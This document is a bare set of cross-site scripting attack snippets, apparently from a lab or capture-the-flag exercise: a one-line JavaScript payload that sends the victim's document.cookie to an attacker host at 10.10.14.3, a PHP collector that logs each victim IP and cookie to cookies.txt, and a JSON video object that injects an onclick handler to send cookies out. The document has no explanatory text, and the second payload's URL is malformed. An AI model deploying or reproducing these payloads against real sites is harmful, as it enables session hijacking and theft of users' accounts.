----------------------------
script.js
new Image().src='http://10.10.14.3/index.php?c='+document.cookie


index.php
<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>
-----------------------------




{
    "type": "video",
    "url": "<link of a video>",
    "videoType": "hosted",
    "videoParams": {
        "onclick":"this.src='//http://10.10.14.3:4444>'+document.cookie;",
        "style": "background-color:black"
    }
}
